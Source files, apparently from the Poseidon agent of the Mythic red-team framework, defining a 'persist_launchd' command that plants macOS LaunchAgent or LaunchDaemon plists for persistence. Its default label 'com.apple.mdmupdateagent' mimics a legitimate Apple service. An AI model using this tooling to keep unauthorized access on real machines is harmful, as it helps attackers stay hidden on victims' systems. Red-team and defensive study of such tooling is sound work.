File: Payload_Type/poseidon/mythic/agent_functions/persist_launchd.py
from mythic_payloadtype_container.MythicCommandBase import *
import json

class PersistLaunchdArguments(TaskArguments):
    def __init__(self, command_line, **kwargs):
        super().__init__(command_line, **kwargs)
        self.args = [
            CommandParameter(
                name="args",
                type=ParameterType.Array,
                description="List of arguments to execute in the ProgramArguments section of the PLIST",
            ),
            CommandParameter(
                name="KeepAlive",
                type=ParameterType.Boolean,
                default_value=True,
                description="When this value is set to true, Launchd will restart the daemon if it dies",
                parameter_group_info=[
                    ParameterGroupInfo(
                        required=False
                    )
                ]
            ),
            CommandParameter(
                name="RunAtLoad",
                type=ParameterType.Boolean,
                default_value=False,
                description="When this value is set to true, Launchd will immediately start the daemon/agent once it has been registered",
                parameter_group_info=[
                    ParameterGroupInfo(
                        required=False
                    )
                ]
            ),
            CommandParameter(
                name="Label",
                type=ParameterType.String,
                default_value="com.apple.mdmupdateagent",
                description="The label for launch persistence",
            ),
            CommandParameter(
                name="LaunchPath",
                type=ParameterType.String,
                description="Path to save the new plist"
            ),
            CommandParameter(
                name="LocalAgent",
                type=ParameterType.Boolean,
                default_value=True,
                description="Should be a local user launch agent"
            ),
        ]

    async def parse_arguments(self):
        if len(self.command_line) > 0:
            if self.command_line[0] == "{":
                self.load_args_from_json_string(self.command_line)
            else:
                raise ValueError("Missing JSON arguments")

        else:
            raise ValueError("Missing arguments")

    async def parse_dictionary(self, dictionary):
        self.load_args_from_dictionary(dictionary)


class PersistLaunchdCommand(CommandBase):
    cmd = "persist_launchd"
    needs_admin = False
    help_cmd = "persist_launchd"
    description = "Create a launch agent or daemon plist file and save it to ~/Library/LaunchAgents or /Library/LaunchDaemons"
    version = 1
    author = "@xorrior"
    attackmapping = ["T1543.001", "T1543.004"]
    argument_class = PersistLaunchdArguments
    attributes = CommandAttributes(
        supported_os=[SupportedOS.MacOS]
    )

    async def create_tasking(self, task: MythicTask) -> MythicTask:
        return task

    async def process_response(self, response: AgentResponse):
        pass

File: Payload_Type/poseidon/poseidon/agentfunctions/persist_launchd.go
package agentfunctions

import (
	"errors"
	"fmt"

	agentstructs "github.com/MythicMeta/MythicContainer/agent_structs"
)

func init() {
	agentstructs.AllPayloadData.Get("poseidon").AddCommand(agentstructs.Command{
		Name:                "persist_launchd",
		Description:         "Create a launch agent or daemon plist file and save it to ~/Library/LaunchAgents or /Library/LaunchDaemons",
		HelpString:          "persist_launchd",
		Version:             1,
		Author:              "@xorrior",
		MitreAttackMappings: []string{"T1543.001", "T1543.004"},
		SupportedUIFeatures: []string{},
		CommandAttributes: agentstructs.CommandAttribute{
			SupportedOS: []string{agentstructs.SUPPORTED_OS_MACOS},
		},
		CommandParameters: []agentstructs.CommandParameter{
			{
				Name:             "args",
				ModalDisplayName: "Program Arguments",
				ParameterType:    agentstructs.COMMAND_PARAMETER_TYPE_ARRAY,
				DefaultValue:     []string{},
				ParameterGroupInformation: []agentstructs.ParameterGroupInfo{
					{
						ParameterIsRequired: false,
						UIModalPosition:     1,
					},
				},
				Description: "List of arguments to execute in the ProgramArguments section of the PLIST",
			},
			{
				Name:          "KeepAlive",
				ParameterType: agentstructs.COMMAND_PARAMETER_TYPE_BOOLEAN,
				DefaultValue:  true,
				ParameterGroupInformation: []agentstructs.ParameterGroupInfo{
					{
						ParameterIsRequired: false,
						UIModalPosition:     2,
					},
				},
				Description: "When this value is set to true, Launchd will restart the daemon if it dies",
			},
			{
				Name:          "RunAtLoad",
				ParameterType: agentstructs.COMMAND_PARAMETER_TYPE_BOOLEAN,
				DefaultValue:  false,
				ParameterGroupInformation: []agentstructs.ParameterGroupInfo{
					{
						ParameterIsRequired: false,
						UIModalPosition:     3,
					},
				},
				Description: "When this value is set to true, Launchd will immediately start the daemon/agent once it has been registered",
			},
			{
				Name:          "Label",
				ParameterType: agentstructs.COMMAND_PARAMETER_TYPE_STRING,
				DefaultValue:  "com.apple.mdmupdateagent",
				ParameterGroupInformation: []agentstructs.ParameterGroupInfo{
					{
						ParameterIsRequired: false,
						UIModalPosition:     4,
					},
				},
				Description: "The label for launch persistence",
			},
			{
				Name:          "LaunchPath",
				ParameterType: agentstructs.COMMAND_PARAMETER_TYPE_STRING,
				ParameterGroupInformation: []agentstructs.ParameterGroupInfo{
					{
						ParameterIsRequired: true,
						UIModalPosition:     5,
					},
				},
				Description: "Path to save the new plist",
			},
			{
				Name:          "remove",
				ParameterType: agentstructs.COMMAND_PARAMETER_TYPE_BOOLEAN,
				DefaultValue:  false,
				ParameterGroupInformation: []agentstructs.ParameterGroupInfo{
					{
						ParameterIsRequired: false,
						UIModalPosition:     6,
					},
				},
				Description: "Remove this persistence",
			},
		},
		TaskFunctionCreateTasking: func(taskData *agentstructs.PTTaskMessageAllData) agentstructs.PTTaskCreateTaskingMessageResponse {
			response := agentstructs.PTTaskCreateTaskingMessageResponse{
				Success: true,
				TaskID:  taskData.Task.ID,
			}
			label, err := taskData.Args.GetStringArg("Label")
			if err != nil {
				response.Success = false
				response.Error = err.Error()
				return response
			}
			path, err := taskData.Args.GetStringArg("LaunchPath")
			if err != nil {
				response.Success = false
				response.Error = err.Error()
				return response
			}
			remove, err := taskData.Args.GetBooleanArg("remove")
			if err != nil {
				response.Success = false
				response.Error = err.Error()
				return response
			}
			if remove {
				displayParams := fmt.Sprintf("removing %s at %s", label, path)
				response.DisplayParams = &displayParams
			} else {
				displayParams := fmt.Sprintf("%s at %s", label, path)
				response.DisplayParams = &displayParams
			}

			return response
		},
		TaskFunctionParseArgDictionary: func(args *agentstructs.PTTaskMessageArgsData, input map[string]interface{}) error {
			return args.LoadArgsFromDictionary(input)
		},
		TaskFunctionParseArgString: func(args *agentstructs.PTTaskMessageArgsData, input string) error {
			if len(input) > 0 {
				return args.LoadArgsFromJSONString(input)
			} else {
				return errors.New("Must supply arguments")
			}
		},
	})
}
